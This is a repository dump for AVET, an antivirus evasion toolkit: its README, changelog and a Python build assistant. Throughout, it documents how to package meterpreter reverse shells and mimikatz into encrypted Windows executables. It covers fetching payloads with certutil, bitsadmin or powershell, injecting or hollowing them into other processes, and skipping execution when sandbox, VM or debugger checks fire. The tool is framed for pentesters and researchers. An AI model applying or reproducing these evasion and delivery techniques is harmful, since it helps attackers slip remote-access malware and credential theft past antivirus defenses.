README.md
# AntiVirus Evasion Tool


AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques, as well as other methods used by malicious software.
For an overview of new features in **v2.4**, as well as past version increments, have a look at the **CHANGELOG** file.


## Table of Contents
- [Installation](#installation)
- [Docker](#docker)
- [AVET the easy way](#avet-the-easy-way)
- [AVET the normal way](#avet-the-normal-way)
- <details><summary>Documentation (<i>click to expand</i>)</summary>

  - [Data retrieval methods](#data-retrieval-methods)
  - [Encryption and Encoding](#encryption-and-encoding)
  - [Sandbox evasion](#sandbox-evasion)
  - [Additional command execution](#additional-command-execution)
  - [Helper tools](#helper-tools)
  - [AVET & metasploit psexec](#avet-&-metasploit-psexec)
  - [Adversarial Examples](#adversarial-examples)
  </details>
- [More](#more)


### Some features
- when running a .exe file made with msfpayload & co, the file will often be recognized by antivirus software
- AVET is an antivirus evasion tool targeting windows machines with executable files
- different kinds of input payloads can be used now: shellcode, exe and dlls
- more techniques available: shellcode/dll injection, process hollowing and more
- flexible retrieval methods for payload, decryption key, etc.
- usage as a dropper
- Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary
- combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques
- basic sandbox checks
- generation of adversarial examples against static detectors based on machine learning
- execute all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of "malicious" samples using different evasion and injection techniques


### Important Note

Not all techniques will evade every AV engine. If one technique or build script does not work, please test another one.
Feel free to experiment! After all this is a toolbox - yet you should wield the hammer yourself.

## Installation

__The Installtion Instruction applies for Kali 64bit and tdm-gcc!__

You can use the setup script:
```bash
./setup.sh
```

This should automatically get you started by installing/configuring wine and installing tdm-gcc.
You'll shortly have to click through the tdm-gcc installer GUI though - standard settings should be fine.
The script will also ask if you want to install AVET's dependencies, which are needed to use some of the build scripts. The fetched dependencies will be put into separate folders next to the avet folder.


Dependencies will grab the latest releases of:
- [pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)
- [mimikatz](https://github.com/gentilkiwi/mimikatz)
- [DKMC](https://github.com/Mr-Un1k0d3r/DKMC)


If for whatever reason you want to install wine and tdm-gcc manually:
- [How to install tdm-gcc with wine](https://govolution.wordpress.com/2017/02/04/using-tdm-gcc-with-kali-2/)

## Docker

If you are not using Kali or don't want to install Metasploit on your system, you can use the Docker Container instead.
The container encapsulates Metasploit and avet and the samples will be created in your current directory.
It is also possible to use an graphical text editor like gedit.

Building the container:
```bash
sudo docker build -t avet:v0.1 .
```
Usage:
```bash
sudo docker run -it --net=host --env="DISPLAY" --volume="$HOME/.Xauthority:/root/.Xauthority:rw" -v $(pwd):/tools/avet/output avet:v0.1 /bin/bash
```
For a better experience it is recommend to alias this.
```bash
# In your .bash_profile, .bashrc or .bash_aliases

alias avet='sudo docker run -it --net=host --env="DISPLAY" --volume="$HOME/.Xauthority:/root/.Xauthority:rw" -v $(pwd):/tools/avet/output avet /bin/bash'
```


## AVET the easy way

**avet.py** is a small Python utility which was designed to assist you in using the tool.

It lists all scripts that are currently present in the build folder. After selecting one, you will be able to step through the script line by line, having the opportunity to modify the contents on the fly.

The latter is especially useful as you can define new LHOST and LPORT variables for msfvenom each time you run a build script via the fabric. 
You can define default LHOST and LPORT values in the `/build/global_connect_config.sh` file, which are used if you don't redefine.

These modifications are temporary, which means that any changes you made will not persist in the build script on disk.
The modified version is executed once, and your executable built.

<details>
<summary>Here is a quick example (<i>Click to expand</i>):</summary>

```
python3 avet.py

                       .|        ,       +
             *         | |      ((             *
                       |'|       `    ._____
         +     ___    |  |   *        |.   |' .---"|
       _    .-'   '-. |  |     .--'|  ||   | _|    |
    .-'|  _.|  |    ||   '-__  |   |  |    ||      |
    |' | |.    |    ||       | |   |  |    ||      |
 ___|  '-'     '    ""       '-'   '-.'    '`      |____
jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Welcome to the avet Assistant!

0 : build_40xshikata_revhttpsunstaged_win32.sh
1 : build_50xshikata_quiet_revhttps_win32.sh
2 : build_50xshikata_revhttps_win32.sh
3 : build_asciimsf_fromcmd_revhttps_win32.sh
4 : build_asciimsf_revhttps_win32.sh
5 : build_avetenc_dynamicfromfile_revhttps_win32.sh
6 : build_avetenc_fopen_revhttps_win32.sh
7 : build_avetenc_mtrprtrxor_revhttps_win64.sh
8 : build_calcfromcmd_50xshikata_revhttps_win32.sh
9 : build_calcfrompowersh_50xshikata_revhttps_win32.sh
10 : build_checkdomain_rc4_mimikatz.sh
11 : build_cpucores_revhttps_win32.sh
12 : build_disablewindefpsh_xorfromcmd_revhttps_win64.sh
13 : build_dkmc_downloadexecshc_revhttps_win32.sh
14 : build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh
15 : build_downloadbitsadmin_revhttps_win32.sh
16 : build_downloadcertutil_revhttps_win32.sh
17 : build_downloadcurl_mtrprtrxor_revhttps_win64.sh
18 : build_downloadiexplorer_revhttps_win32.sh
19 : build_downloadpsh_revhttps_win32.sh
20 : build_downloadsocket_mtrprtrxor_revhttps_win64.sh
21 : build_downloadsocket_revhttps_win32.sh
22 : build_dynamicfromfile_revhttps_win32.sh
23 : build_fibonacci_rc4_mimikatz.sh
24 : build_fopen_mtrprtrxor_revhttps_win64.sh
25 : build_fopen_quiet_revhttps_win32.sh
26 : build_fopen_revhttps_win32.sh
27 : build_getchar_rc4_mimikatz.sh
28 : build_gethostbyname_revhttps_win32.sh
29 : build_hasvmkey_revhttps_win32.sh
30 : build_hasvmmac_revtcp_win32.sh
31 : build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh
32 : build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh
33 : build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh
34 : build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh
35 : build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh
36 : build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh
37 : build_kaspersky_fopen_shellrevtcp_win32.sh
38 : build_mimikatz_pe2shc_xorfromcmd_win64.sh
39 : build_pause_rc4_mimikatz.sh
40 : build_rc4_interactive_pwsh_mimikatz_win64.sh
41 : build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh
42 : build_rc4enc_mimikatz_win64.sh
43 : build_sleep_rc4_mimikatz.sh
44 : build_sleepbyping_rc4_mimikatz.sh
45 : build_timedfibonacci_rc4_mimikatz.sh
46 : buildsvc_20xshikata_bindtcp_win32.sh

Which Script would you like to configure and build?
Enter the corresponding number -> 43

DESCRIPTION :
# RC4-encrypt the payload with a static, preset key.
# Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode.
# pe_to_shellcode is written by Hasherezade:
# https://github.com/hasherezade/pe_to_shellcode

# This script expects the Mimikatz executable to be at input/mimikatz.exe
# and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe

Configure the Build Script

# enable debug output
-> enable_debug_print

# generate key file with preset key
-> generate_key preset aabbccdd1122

Do you want to add sandbox evasions? [y/N]
-> N

Executable will be created Shortly please wait.

*** ============================================= ***

         .==,_                                          
        .===,_`\\                                        
      .====,_ ` \\      .====,__                         
---     .==-,`~. \\           `:`.__,                    
 ---      `~~=-.  \\           /^^^     MEEP MEEP        
   ---       `~~=. \\         /                          
                `~. \\       /                           
                  ~. \\____./                            
                    `.=====)                            
                 ___.--~~~--.__                         
       ___\\.--~~~              ~~~---.._|/              
       ~~~\\\"                             /              

 ________  ___      ___ _____  __________  
|\   __  \|\  \    /  /|\  __\ |\___   __\ 
\ \  \|\  \ \  \  /  / | \ \__ \|__|\  \_| 
 \ \   __  \ \  \/  / / \ \  _\    \ \  \  
  \ \  \ \  \ \    / /   \ \ \___   \ \  \ 
   \ \__\ \__\ \__/ /     \ \____\   \ \__\
    \|__|\|__|\|__|/       \|_____|   \|__|

*** ============================================= ***

Reading module from: input/mimikatz.exe
[WARNING] This is a console application! The recommended subsystem is GUI.
[+] Saved as: input/sc_raw.txt
Starting RC4 encoder...
Reading payload from file input/sc_raw.txt, expecting raw format.
payload size in bytes is 1309884
Reading key from file input/key_raw.txt, expecting raw format.
Key length in bytes is 6
Applying RC4 algorithm
Writing payload to file input/sc_enc_raw.txt

# The decryption key is aabbccddee if it has not been changed.
# You need to provide the decryption key as 2nd command line argument.
# Call generated executable on target like:
# $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee']  [decryption key]


Your executable should be in the output folder!
```
</details>

## AVET the normal way

Of course it is possible to run all commands step by step from command line. However, in the "build" folder you will find preconfigured build scripts for relevant use cases. 
The build scripts themselves are written so as they have to be called from within the avet directory:
```bash
kali@kali:~/tools/avet$ ./build/build_fopen_mtrprtrxor_revhttps_win64.sh
```

You can define default LHOST and LPORT values for metasploit payloads in the `/build/global_connect_config.sh` file, which are used if you don't redefine.


### Usage examples

Generate a 32-bit process hollowing executable in two steps (as in build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win32.sh):

First, generate the hollowing payload with AVET:
- generate meterpreter/reverse_https 32-bit shellcode
- the meterpreter shellcode will be XOR encrypted with a 5-byte preset key
- the shellcode will be compiled into the generated executable
- fopen and gethostbyname sandbox evasion environmental checks will be made before executing the shellcode
	
Second, build the "dropper" executable that delivers the first step payload via hollowing:
- statically compile the first step payload into the executable
- the payload will be XOR encrypted with a different 5-byte preset key
- again, fopen and gethostbyname sandbox evasion environmental checks will be made before hollowing
- the hollowing target PID will be delivered via command line argument on execution time
	
So you get a two-layer environmental-checked and encrypted meterpreter payload, hollowed into a process of your choice.
While the settings in the build script are mostly for demonstration purposes, there is a lot of flexibility to customize your generated executable by making simple modifications to the build script.

You could switch out data retrieval methods: Instead of statically compiling most data into the executable, you could download your hollowing payload via powershell, download the decryption key via sockets, use different encryption or environmental checks, etc.

Or try to add more evasion layers by doing a third build iteration.
Or switch out the payload. Want to use Mimikatz instead? Convert it into shellcode via https://github.com/hasherezade/pe_to_shellcode, and change the payload in the build script.

Of course, you can also design more minimalistic builds, like executing unencrypted shellcode with only one environmental check, or maybe 50 iterations of shikata are enough to reach your goal?
Choose/modify the build scripts, suiting your needs.


### Build scripts

Below, find a list of all currently shipped build scripts. The names should hint at each script's functionality.
For detailed information, consider the comments inside the scripts.
Feel free to modify/write your own build scripts to build your custom executable!

<details>
<summary><i>Click to expand</i></summary>

  ```
  build_40xshikata_revhttpsunstaged_win32.sh
  build_50xshikata_revhttps_win32.sh
  build_50xshikata_quiet_revhttps_win32.sh
  build_asciimsf_fromcmd_revhttps_win32.sh
  build_asciimsf_revhttps_win32.sh
  build_avetenc_dynamicfromfile_revhttps_win32.sh
  build_avetenc_fopen_revhttps_win32.sh
  build_avetenc_mtrprtrxor_revhttps_win64.sh
  build_calcfromcmd_50xshikata_revhttps_win32.sh
  build_calcfrompowersh_50xshikata_revhttps_win32.sh
  build_cpucores_revhttps_win32.sh
  build_checkdomain_rc4_mimikatz.sh
  build_disablewindefpsh_xorfromcmd_revhttps_win64.sh
  build_dkmc_downloadexecshc_revhttps_win32.sh
  build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh
  build_downloadbitsadmin_revhttps_win32.sh
  build_downloadcertutil_revhttps_win32.sh
  build_downloadcurl_mtrprtrxor_revhttps_win64.sh
  build_downloadiexplorer_revhttps_win32.sh
  build_downloadpsh_revhttps_win32.sh
  build_downloadsocket_mtrprtrxor_revhttps_win64.sh
  build_downloadsocket_revhttps_win32.sh
  build_dynamicfromfile_revhttps_win32.sh
  build_fibonacci_rc4_mimikatz.sh
  build_fopen_mtrprtrxor_revhttps_win64.sh
  build_fopen_quiet_revhttps_win32.sh
  build_fopen_revhttps_win32.sh
  build_getchar_rc4_mimikatz.sh
  build_gethostbyname_revhttps_win32.sh
  build_hasvmkey_revhttps_win32.sh
  build_hasvmmac_revtcp_win32.sh
  build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh
  build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh
  build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh
  build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh
  build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh
  build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh
  build_kaspersky_fopen_shellrevtcp_win32.sh
  build_mimikatz_pe2shc_xorfromcmd_win64.sh
  build_pause_rc4_mimikatz.sh
  build_rc4_interactive_pwsh_mimikatz_win64.sh
  build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh
  build_rc4enc_mimikatz_win64.sh
  build_sleep_rc4_mimikatz.sh
  build_sleepbyping_rc4_mimikatz.sh
  build_timedfibonacci_rc4_mimikatz.sh
  buildsvc_20xshikata_bindtcp_win32.sh
  ```
</details>


## Documentation

### Data retrieval methods
These methods are compatible with all of AVET's data sources and can be used as such in the build script.

A few examples:
```
# Compiles the command 'calc.exe' statically into the executable, which will then be executed via cmd at sample startup.
set_command_source static_from_here 'calc.exe'
set_command_exec exec_via_cmd

# Download 64-bit shellcode via powershell, and execute. 
set_payload_source download_powershell
set_payload_execution_method exec_shellcode64

# Download XOR decryption key into memory. (Server to download from is always specified via first command line argument on execution). Decode the payload.
set_key_source download_socket
set_decoder xor

# Retrieves the tuple (target PID, dll path) from command line on execution
set_payload_info_source from_command_line_raw
set_payload_execution_method inject_dll
```
If features are skipped/not used, you have to specify NOP-like behavior instead:
```
set_command_source no_data
set_command_exec no_command
```

#### static_from_file
The data is retrieved from a file and is statically compiled into the generated executable.
For this to work, the data must be provided as a c-style array at compilation time, like
```
unsigned char buf[] = "\x00\x11\x22\x33";
```

#### static_from_here
The data is statically compiled into the generated executable,
retrieved from the specified argument in the build script.

#### dynamic_from_file
The data is read from a file at run time.

#### from_command_line_hex
Retrieves data from a "11aabb22.." format hex string (from the command line).

#### from_command_line_raw
Retrieves data from a command line argument. The given ASCII string is interpreted as raw byte data.

#### download_certutil
Downloads data from a specified URI, using ```certutil.exe -urlcache -split -f```.
Drops the downloaded file to disk before reading the data.

#### download_curl
Downloads the data using curl.
Drops the downloaded file to disk before reading the data.

#### download_internet_explorer
Downloads data from a specified URL, using Internet Explorer.
Drops the downloaded file to disk before reading the data.

#### download_powershell
Downloads data from a specified URI via powershell.
Drops the downloaded file to disk before reading the data.

#### download_socket
Downloads the data from a specified URI, using sockets.
Data is read directly into memory, no file is dropped to disk.

#### download_bitsadmin
Downloads the data using the BITSAdmin Windows utility.
Drops the downloaded file to disk before reading the data.


### Payload execution methods
How to execute/deliver the payload. The injection/hollowing methods require additional information about the injection target, which can be given via ```set_payload_info_source <the_info>``` (see data retrieval methods).

#### exec_shellcode
Executes 32-bit shellcode with a C function binding.

#### exec_shellcode64
Executes 64-bit shellcode with a C function binding and VirtualProtect.

#### exec_shellcode_ASCIIMSF
Executes ASCIIMSF encoded shellcode via ```call eax```.

#### hollowing32
Instanciates a new process, cuts out the original image and hollows the given payload into the new process.
The payload is a 32-bit executable image. Works on 32-bit targets.

#### hollowing64
Same as hollowing32, but using 64-bit PE payloads for 64-bit target processes.

#### inject_dll
Injects a dll into a target process, using ```CreateRemoteThread```.
Injection works for 32-bit payloads into 32-bit processes, and 64-bit payloads into 64-bit processes, respectively.

#### inject_shellcode
Injects shellcode into a target process, using ```CreateRemoteThread```.
Injection works for 32-bit shellcode into 32-bit processes, and 64-bit shellcode into 64-bit processes, respectively.


### Encryption and Encoding
AVET provides encoders for each scheme, which can be applied on the payload before compilation/delivery.
On execution, the specified decoder then again deobfuscates the payload at runtime.

Here is an RC4 example, where the decryption key is retrieved from the command line in hex format at execution time:
```
generate_key preset aabbccddee input/key_raw.txt
encode_payload rc4 input/shellcode_raw.txt input/shellcode_enc_raw.txt input/key_raw.txt
set_key_source from_command_line_hex
set_decoder rc4
```

You can also skip the encoding feature by not further encoding the shellcode, and setting:
```
set_key_source no_data
set_decoder none
```

#### xor
Rolling XOR, supporting multi-byte keys.

#### avet
Custom encoding, reinterpreting the ASCII format.

#### rc4
RC4 encryption/decryption, with flexible key length.


### Debugger and Sandbox evasion
These are environmental checks that are performed before eventual encoding and payload execution.
If an unpleasant execution environment is detected (e.g. an AV sandbox), execution stops.

Currently, you can arbitrarily queue up to 10 checks. Using the same technique multiple times is supported.
The queue limit *EVASION_ARRAY_SIZE* can however be easily modified in *avet.c*.

#### is debugger present
Check with isDebuggerPresent() function if a debugger is present.
Exit if true.
```
add_evasion is_debugger_present
```

#### sleep
Sleep for certain time before execution. The duration(in Seconds) can be specified in the build script, like

```
# sleep for 3 seconds
add_evasion evasion_by_sleep 3
```

#### sleep by ping
Halt execution of the program for specified seconds by invoking a timed ping command against localhost.
The program pings once each second.
```
add_evasion sleep_by_ping 4
```

#### check fast forwarding
Check if sandbox utilize fast forwarding to reduce heuristic check time. Local time and sleep is used.
```
add_evasion check_fast_forwarding
```

#### get tickcount
Check if sandbox utilize fast forwarding to reduce heuristic check time. Uptime and sleep is used.
```
add_evasion get_tickcount
```

#### Username
Get username and compare with given username. Exit if it does not match.

```
add_evasion has_username 'IEUser'
```

#### Messagebox
Spawn simple Messagebox before execution. If Arithmetic is not solved correctly, the program exits.
```
add_evasion interaction_msg_box
```

#### getchar
Wait until input is delivered using getchar.
```
add_evasion interaction_getchar
```

#### system pause
Execute system("pause"), causing the spawned cmd (and our main process) to wait for any keypress.
```
add_evasion interaction_system_pause
```

#### fopen
Checks for the existence of a file. If not found, stop execution.
The file name can be specified in the build script, like
```
add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini'
```

#### bios info
Checks if it is possible to fetch SMBIOS firmware table. Stop execution if not.

```
add_evasion get_bios_info
```

#### gethostbyname
Try to resolve a hostname of your choice. If gethostbyname returns unequals NULL, stop execution.
The hostname to check against can be specified in the build script, like
```
add_evasion gethostbyname_sandbox_evasion 'testdomain.com'
```

#### get_cpu_cores
Checks number of CPU cores on the target. If the number is lower than the specified value, stop execution.
```
add_evasion get_cpu_cores 2
```

#### has_vm_mac
Checks for vendor-specific MAC prefixes. If any identified, stop execution.
```
add_evasion has_vm_mac
```

#### has_vm_regkey
Checks for vendor-specific registry keys. If any identified, stop execution.
```
add_evasion has_vm_regkey
```

#### hide_console
Not really an evasion technique, but hides your console window ;)
```
add_evasion hide_console
```

#### Installation Date
Fetch Installation date of Windows and compare it to the specified one. If the dates do not match, stop execution. The date needs to be specified in format dd/mm/yyyy.

```
add_evasion get_install_date '24/11/2007'
```

#### Number of Processes
Count the number of running Processes. If the number of the processes is smaller than given threshold, stop execution.

```
add_evasion get_num_processes 50
```

#### Standard Browser
Read Registry Key to get the default Browser. If the Browser does not match with given value, stop execution. Possible values are  MSEdgeHTM, Firefox or ChromeHTML.

```
add_evasion get_standard_browser 'Firefox'
```

#### Domain
Queries the DNS domain the target is in.
If the target is not in the expected domain as specified, the program exits.
```
add_evasion get_computer_domain 'domain.com'
```

#### Computation
Fibonacci


CHANGELOG
CHANGELOG
---------
Version 2.4.1
	+++ CHANGES +++
	- added has_process_exit
	- added quick and dirty support for compiling with c++


Version 2.4
	+++ CHANGES +++
	- added adversarial examples vs. static machine learning detectors (credits go to Thund3rPat)
	- 3 new sandbox evasions
	- new build script to test all current available sandbox evasions
	- minor bug fixes


Version 2.3
	+++CHANGES +++
	- switch to Mingw-Crosscompiler
	- add Dockerfile which encapsulates Metasploit and Avet
	- 23 new Sandbox Evasions
	- setup script can download dependencies


Version 2.2
	+++ CHANGES +++
	- Generated executables are now named after their buildscripts instead of "output.exe".
	- added "build_script_tester.py", a script which executes all build scripts and fetch error messages.
	- Usage of executables is now echoed to screen
	- replace "avet_fabric.py" with "avet.py". "avet.py" helps new users to configure and build scripts without changing the orignal build script.
	- new build scripts structure with tags(tags are only relevant for avet.py)
	- adjust setup to work with Kali 2020.1
	- updated tdm-gcc to version 9.2.0
	- added curl as download method


Version 2.1

    +++ KNOWN ISSUES +++
    - DKMC integration still not working properly, probably due to corrupt shellcode.
    - when built as a service, debug logging into file does not work. this is probably a permission problem.

    +++ CHANGES +++
    - enacted build script naming reform, so that the most prominent feature is mentioned first in the script name
    - added RC4 encoder/decoder
    - pe_to_shellcode integration, which enables using .exe files as input by converting them into callable shellcode
    - added ability to execute cmd/powershell command payloads at sample startup. these payloads are compatible with the built-in data retrieval methods.
    - added static_from_here retrieval method to specify static inputs directly in the build script
    - added ability to supply arguments for evasion techniques directly in the build script, e.g. specifying fopen file target
    - added bitsadmin data retrieval method
    - added environmental checks for sandbox evasion: checking VM MAC, number of CPU cores, checking VM registry keys
    - example build scripts for new features
    - general bugfixes and improvements


Version 2

    +++ KNOWN ISSUES +++
	- downloadexecshellcode_DKMC not working properly. DKMC probably delivers corrupt shellcode, needs further investigation.
    - when built as a service, debug logging into file does not work. this is probably a permission problem.

	+++ CHANGES +++

    General rebuild:
	- major folder restructuring, code is now more modular:
		* sources are now gathered in the source folder
		* modularized shellcode binding methods
		* modularized evasion techniques
		* modularized encoders/decoders
		* modularized data retrieval methods
	- bundled basic data conversion and file interaction functions in data_utility.h
	- moved sh_format utility into tools folder
	- added data_raw_to_c tool that converts raw shellcode into c-array style for static source file includes
	- added supreme ASCII art banner as text file, which can be printed in build scripts when using AVET
	- structured files generated by AVET into new input and output folders
	- implemented bash function interface in feature_construction.sh, which provides a simple language to be used in build scripts for easier configuration
	- removed make_avet, the complete AVET executable generation is now configured in the build script language
	- updated build scripts to use the new construction language
	- added global connect config for generalized LHOST and LPORT settings in payloads
	- completely redesigned avet.c to support the new modular configuration options
	- reimplemented avetsvc.c based on new avet.c
	- removed make_avetsvc
	- implemented new debug output macro that makes code more readable
	- integrated old sh_format utility as avet encoder/decoder module
	- added xor encoder/decoder
	- added key generation utility to ease encoder use
	- generalized shellcode retrieval as data retrieval, so that retrieval methods can be used for all imported data, such as encryption keys
	- fixed several data retrieval methods so that they are more robust in execution and more readable in code
	- implemented new data retrieval methods
	- major code commenting offensive
	- bugfixes

    BFG integration (BFG project:   https://github.com/govolution/bfg)
    - major renaming from "shellcode" into "payload" in sources and scripts
    - introduced new data retrieval category get_payload_info, where parameters such as target process PID can be delivered for hollowing, injection etc.
    - added reset_evasion_tecnhnique_counter build script function to support compilation of multiple payloads in one build script
    - integrated process hollowing for 32 and 64 bit targets from BFG, including new build scripts
    - integrated shellcode injection for 32 and 64 bit targets from BFG, including new build scripts
    - integrated dll injection for 32 and 64 bit targets from BFG, including new build scripts

	For details, consider the commit messages.


Version 1.3
- downloading shellcode using powershell or certutil
- downloading shellcode into memory and exec from memory
- added more build scripts for new options

Version 1.2
- AVET now has support for metasploits psexec
- basic support for metasploits ASCII encoder, more to come
- of cource more build scripts
- support for msf ASCII call via cmd
- added "killswitch" (gethostbyname) evasion technique
- added -q for quiet mode (hiding window)

Version 1.1
- avet_fabric for assisted execution of the build scripts
- more cleanup of avet.c
- removed all options from avet.c itself for reducing codebase (less detectable in the future)
- added options from avet to make_avet
- added build scripts
- added -F for explicit fopen sandbox escape
- added -X for 64 bit support

avet.py
#!/usr/bin/python3.9

import os
import stat
import glob
import readline
import subprocess


def print_banner():
    banner = """
                       .|        ,       +
             *         | |      ((             *
                       |'|       `    ._____
         +     ___    |  |   *        |.   |' .---"|
       _    .-'   '-. |  |     .--'|  ||   | _|    |
    .-'|  _.|  |    ||   '-__  |   |  |    ||      |
    |' | |.    |    ||       | |   |  |    ||      |
 ___|  '-'     '    ""       '-'   '-.'    '`      |____
jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"""
    print(banner)
    print("\nWelcome to the avet Assistant!\n")


# define rlinput (for user input with placeholder)
def rlinput(prompt, prefill=''):
    readline.set_startup_hook(lambda: readline.insert_text(prefill))
    try:
        return input(prompt)
    finally:
        readline.set_startup_hook()


# Helper function to remove a prefix from a string.
# Starting from python 3.9+ removeprefix() can be used instead.
def remove_prefix(text, prefix):
    if text.startswith(prefix):
        return text[len(prefix):]
    return text


# This fuction opens global_connect_config.sh and returns host and port
def fetch_global_connect():
    with open("./global_connect_config.sh") as connect:
        for line in connect:
            if line[0:13] == "GLOBAL_LHOST=":
                host = line[13:].strip()
            if line[0:13] == "GLOBAL_LPORT=":
                port = line[13:].strip()

    return host, port


# Enumerate and print available build scripts in /build.
# The user can make choose one of the build scripts to configure.
def print_build_scripts():
    os.chdir("./build")

    build_scripts = glob.glob('./build*.sh')
    build_scripts.sort()
    for i, script in enumerate(build_scripts):
        print("%d : %s" % (i, remove_prefix(script, "./")))

    print("\nWhich Script would you like to configure and build?")
    return build_scripts[int(input("Enter the corresponding number -> "))]


# Print the information between the #Tags in the build script
def print_tag(choice, tag):
    print("\n%s :" % tag)
    with open(choice, 'r') as file:
        switch = False
        for line in file:
            if line == "#%s_END\n" % tag:
                switch = False

            if switch:
                print(line, end='')

            if line == "#%s_START\n" % tag:
                switch = True


# Here, the user is able to make changes in the selected build script between the #CONFIGURATION Tags
# The whole build script with changes will be copied to a temporary script "avet_script_config.sh"
def build_script_configurator(choice):
    print("\nConfigure the Build Script")
    with open(choice, 'r') as file:
        script = file.readlines()
    with open("./avet_script_config.sh", 'w') as config:
        switch = False
        for line in script:

            if line == '#CONFIGURATION_END\n':
                switch = False

                # sandbox evasions
                print("\nDo you want to add sandbox evasions? [y/N]")
                answer = input("-> ").lower().strip()
                if answer == "y" or answer == "yes":
                    modules = sandbox_evasions_pick()

                    for sand in modules:
                        evasion = rlinput("-> ", "add_evasion %s " % sand)
                        config.write(evasion + "\n")

            if switch:
                if line[0:2] == "# ":
                    print("\n"+line.strip())
                else:
                    # Replace host and port Variable with the decimal numbers configured in global_connect_config.sh
                    if "$GLOBAL" in line:
                        host, port = fetch_global_connect()
                        if line[0:6] == "LPORT=":
                            current_line = rlinput("-> ", "LPORT=" + port)
                        elif line[0:6] == "LHOST=":
                            current_line = rlinput("-> ", "LHOST=" + host)

                    # only configure the key, not the raw file
                    elif "generate_key" in line:
                        current_line = rlinput("-> ", line[0:-19])
                        current_line += line[-19:]
                    else:
                        current_line = rlinput("-> ", line.strip())

                    config.write(current_line + "\n")
            else:
                config.write(line)

            if line == '#CONFIGURATION_START\n':
                switch = True
        print("\nExecutable will be created Shortly please wait.\n")


# In this function the user picks from a list of sandbox evasions.
# The chosen evasions are returned as a list.
def sandbox_evasions_pick():
    sandbox_modules = glob.glob("../source/implementations/evasion/*.h")
    sandbox_modules.sort()
    sandbox_modules.insert(0, "Finished Picking, Stop Here")
    to_add = []
    while True:
        for i, module in enumerate(sandbox_modules):
            print("%d : %s" % (i, remove_prefix(
                module, "../source/implementations/evasion/")[:-2]))

        print("\nWhich module would you like to add?")
        choice = int(input("Enter the corresponding number -> "))
        if choice == 0:
            break
        to_add.append(remove_prefix(
            sandbox_modules[choice], "../source/implementations/evasion/")[:-2])
        sandbox_modules.pop(choice)

    return to_add


# The tempory script will be executed
def build():
    os.chdir("..")

    st = os.stat('./build/avet_script_config.sh')
    os.chmod('./build/avet_script_config.sh', st.st_mode | stat.S_IEXEC)

    process = subprocess.run(
        ["./build/avet_script_config.sh"], stdout=subprocess.PIPE)
    output = process.stdout.decode("utf-8")
    print(output)
    print("Your executable should be in the output folder!")


def main():
    print_banner()
    choice = print_build_scripts()
    print_tag(choice, "DESCRIPTION")
    build_script_configurator(choice)
    build()

    os.remove("./build/avet_script_config.sh")


if __name__ == "__main__":
    main()
